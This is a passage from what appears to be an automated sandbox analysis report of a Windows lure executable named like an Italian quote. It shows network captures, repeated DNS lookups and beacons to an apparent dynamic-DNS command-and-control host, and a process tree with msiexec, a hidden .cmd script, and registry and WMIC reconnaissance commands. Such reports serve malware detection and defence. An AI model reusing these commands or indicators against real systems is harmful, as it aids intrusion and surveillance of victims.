Jan 23, 2024 12:18:18.368288040 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.368294954 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.368382931 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.368896961 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.368980885 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.368985891 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.369035959 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.488894939 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.488907099 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.661247969 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.661262035 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.661279917 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.661329985 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.661340952 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:18.661367893 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.661389112 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.743396997 CET	49740	443	192.168.2.4	52.202.204.11
Jan 23, 2024 12:18:18.743443966 CET	443	49740	52.202.204.11	192.168.2.4
Jan 23, 2024 12:18:22.051400900 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.051444054 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.051523924 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.051836014 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.051851988 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.367913008 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.368402958 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.368437052 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.369436979 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.369497061 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.408909082 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.409085035 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.409183979 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.453907967 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.486505032 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.486571074 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.515590906 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:22.515680075 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.516412020 CET	49747	443	192.168.2.4	23.54.200.159
Jan 23, 2024 12:18:22.516447067 CET	443	49747	23.54.200.159	192.168.2.4
Jan 23, 2024 12:18:25.620049000 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:25.742728949 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:18:25.744896889 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:25.746346951 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:25.770776987 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:25.893244028 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:18:35.908354044 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:36.031210899 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:18:46.033581018 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:46.156461954 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:18:56.174005032 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:18:56.297275066 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:19:06.299117088 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:19:06.422399998 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:19:16.425880909 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:19:16.548703909 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:19:26.549020052 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:19:26.671834946 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:19:36.676428080 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:19:36.799540997 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:19:46.814779997 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:19:46.937870979 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:19:56.955323935 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:19:57.078058958 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:20:07.080303907 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:20:07.203185081 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:20:17.205255032 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:20:17.327846050 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:20:27.330341101 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:20:27.453284979 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:20:37.455410957 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:20:37.578325987 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:20:47.580430031 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:20:47.703528881 CET	5500	49749	140.228.29.110	192.168.2.4
Jan 23, 2024 12:20:57.720922947 CET	49749	5500	192.168.2.4	140.228.29.110
Jan 23, 2024 12:20:57.843878031 CET	5500	49749	140.228.29.110	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 12:17:58.739626884 CET	59421	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:17:58.858447075 CET	53	59421	1.1.1.1	192.168.2.4
Jan 23, 2024 12:18:22.180207968 CET	64894	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:18:22.339932919 CET	53	64894	1.1.1.1	192.168.2.4
Jan 23, 2024 12:18:40.412035942 CET	60215	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:18:40.570370913 CET	53	60215	1.1.1.1	192.168.2.4
Jan 23, 2024 12:19:04.518619061 CET	53832	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:19:04.658823967 CET	53	53832	1.1.1.1	192.168.2.4
Jan 23, 2024 12:19:28.738209009 CET	50384	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:19:28.898479939 CET	53	50384	1.1.1.1	192.168.2.4
Jan 23, 2024 12:19:52.877954960 CET	63247	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:19:53.018186092 CET	53	63247	1.1.1.1	192.168.2.4
Jan 23, 2024 12:20:16.956233978 CET	62376	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:20:17.096158981 CET	53	62376	1.1.1.1	192.168.2.4
Jan 23, 2024 12:20:41.206412077 CET	54076	53	192.168.2.4	1.1.1.1
Jan 23, 2024 12:20:41.365834951 CET	53	54076	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 23, 2024 12:17:58.739626884 CET	192.168.2.4	1.1.1.1	0xdb8c	Standard query (0)	www.example.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:18:22.180207968 CET	192.168.2.4	1.1.1.1	0xb714	Standard query (0)	vnvariant2024.ddnsfree.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:18:40.412035942 CET	192.168.2.4	1.1.1.1	0xead6	Standard query (0)	vnvariant2024.ddnsfree.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:19:04.518619061 CET	192.168.2.4	1.1.1.1	0x7c5	Standard query (0)	vnvariant2024.ddnsfree.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:19:28.738209009 CET	192.168.2.4	1.1.1.1	0x49af	Standard query (0)	vnvariant2024.ddnsfree.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:19:52.877954960 CET	192.168.2.4	1.1.1.1	0xc325	Standard query (0)	vnvariant2024.ddnsfree.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:20:16.956233978 CET	192.168.2.4	1.1.1.1	0x3718	Standard query (0)	vnvariant2024.ddnsfree.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:20:41.206412077 CET	192.168.2.4	1.1.1.1	0x286f	Standard query (0)	vnvariant2024.ddnsfree.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 23, 2024 12:17:58.858447075 CET	1.1.1.1	192.168.2.4	0xdb8c	No error (0)	www.example.com	93.184.216.34	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:18:22.339932919 CET	1.1.1.1	192.168.2.4	0xb714	No error (0)	vnvariant2024.ddnsfree.com	140.228.29.110	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:18:40.570370913 CET	1.1.1.1	192.168.2.4	0xead6	No error (0)	vnvariant2024.ddnsfree.com	140.228.29.110	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:19:04.658823967 CET	1.1.1.1	192.168.2.4	0x7c5	No error (0)	vnvariant2024.ddnsfree.com	140.228.29.110	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:19:28.898479939 CET	1.1.1.1	192.168.2.4	0x49af	No error (0)	vnvariant2024.ddnsfree.com	140.228.29.110	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:19:53.018186092 CET	1.1.1.1	192.168.2.4	0xc325	No error (0)	vnvariant2024.ddnsfree.com	140.228.29.110	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:20:17.096158981 CET	1.1.1.1	192.168.2.4	0x3718	No error (0)	vnvariant2024.ddnsfree.com	140.228.29.110	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:20:41.365834951 CET	1.1.1.1	192.168.2.4	0x286f	No error (0)	vnvariant2024.ddnsfree.com	140.228.29.110	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

https:

p13n.adobe.io

armmf.adobe.com

www.example.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49729	93.184.216.34	80	5924	C:\Users\user\Desktop\Preventivo24.01.11.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 12:17:58.970385075 CET	154	OUT	GET /download/updates.txt HTTP/1.1 Accept: / User-Agent: AdvancedInstaller Host: www.example.com Connection: Keep-Alive Cache-Control: no-cache
Jan 23, 2024 12:17:59.073906898 CET	1286	IN	HTTP/1.1 404 Not Found Accept-Ranges: bytes Age: 590017 Cache-Control: max-age=604800 Content-Type: text/html; charset=UTF-8 Date: Tue, 23 Jan 2024 11:17:59 GMT Expires: Tue, 30 Jan 2024 11:17:59 GMT Last-Modified: Tue, 16 Jan 2024 15:24:22 GMT Server: ECS (agb/52BB) Vary: Accept-Encoding X-Cache: 404-HIT Content-Length: 1256 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
Jan 23, 2024 12:17:59.074006081 CET	312	IN	Data Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69 Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	52.202.204.11	443	7212	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-23 11:18:17 UTC	1353	OUT	OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1 Host: p13n.adobe.io Connection: keep-alive Accept: / Access-Control-Request-Method: GET Access-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-key Origin: https://rna-resource.acrobat.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://rna-resource.acrobat.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-01-23 11:18:18 UTC	508	IN	HTTP/1.1 204 No Content Server: openresty Date: Tue, 23 Jan 2024 11:18:18 GMT Content-Type: text/plain Content-Length: 0 Connection: close Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: x-request-id X-Request-Id: 8Dj2dD09FwtnTtee8qITRp7de9DZ5kcG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	52.202.204.11	443	7212	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-23 11:18:18 UTC	1473	OUT	GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1 Host: p13n.adobe.io Connection: keep-alive sec-ch-ua: "Chromium";v="105" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37 x-adobe-uuid-type: visitorId x-api-key: AdobeReader9 sec-ch-ua-platform: "Windows" Origin: https://rna-resource.acrobat.com Accept-Language: en-US,en;q=0.9 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://rna-resource.acrobat.com/ Accept-Encoding: gzip, deflate, br
2024-01-23 11:18:18 UTC	544	IN	HTTP/1.1 200 Server: openresty Date: Tue, 23 Jan 2024 11:18:18 GMT Content-Type: application/json;charset=UTF-8 Content-Length: 7281 Connection: close x-request-id: 4nwnn8HNcjSfATeUXDJ7GaIWAgdVR8TD vary: accept-encoding Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: x-request-id
2024-01-23 11:18:18 UTC	7281	IN	Data Raw: 7b 22 73 75 72 66 61 63 65 73 22 3a 7b 22 44 43 5f 52 65 61 64 65 72 5f 52 48 50 5f 42 61 6e 6e 65 72 22 3a 7b 22 63 6f 6e 74 61 69 6e 65 72 73 22 3a 5b 7b 22 63 6f 6e 74 61 69 6e 65 72 49 64 22 3a 31 2c 22 63 6f 6e 74 61 69 6e 65 72 4c 61 62 65 6c 22 3a 22 4a 53 4f 4e 20 66 6f 72 20 52 65 61 64 65 72 20 44 43 20 52 48 50 20 42 61 6e 6e 65 72 22 2c 22 64 61 74 61 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 2c 22 64 61 74 61 22 3a 22 65 79 4a 6a 64 47 45 69 4f 6e 73 69 64 48 6c 77 5a 53 49 36 49 6d 4a 31 64 48 52 76 62 69 49 73 49 6e 52 6c 65 48 51 69 4f 69 4a 47 63 6d 56 6c 49 44 63 74 52 47 46 35 49 46 52 79 61 57 46 73 49 69 77 69 5a 32 39 66 64 58 4a 73 49 6a 6f 69 61 48 52 30 63 48 4d 36 4c 79 39 68 59 33 4a 76 59 6d 46 30 Data Ascii: {"surfaces":{"DC_Reader_RHP_Banner":{"containers":[{"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","dataType":"application/json","data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49747	23.54.200.159	443	7212	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-23 11:18:22 UTC	475	OUT	GET /onboarding/smskillreader.txt HTTP/1.1 Host: armmf.adobe.com Connection: keep-alive Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br If-None-Match: "78-5faa31cce96da" If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
2024-01-23 11:18:22 UTC	198	IN	HTTP/1.1 304 Not Modified Content-Type: text/plain; charset=UTF-8 Last-Modified: Mon, 01 May 2023 15:02:33 GMT ETag: "78-5faa31cce96da" Date: Tue, 23 Jan 2024 11:18:22 GMT Connection: close

Target ID:	0
Start time:	12:17:57
Start date:	23/01/2024
Path:	C:\Users\user\Desktop\Preventivo24.01.11.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Preventivo24.01.11.exe
Imagebase:	0xe80000
File size:	5'955'744 bytes
MD5 hash:	32F35B78A3DC5949CE3C99F2981DEF6B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:18:00
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Imagebase:	0x540000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:18:02
Start date:	23/01/2024
Path:	C:\Games\viewer.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Imagebase:	0x610000
File size:	412'832 bytes
MD5 hash:	29ED7D64CE8003C0139CCCB04D9AF7F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:18:03
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:18:03
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:18:03
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:18:03
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:18:03
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0xbc0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:18:04
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic process where (name="taskhost.exe") get commandline
Imagebase:	0xf10000
File size:	427'008 bytes
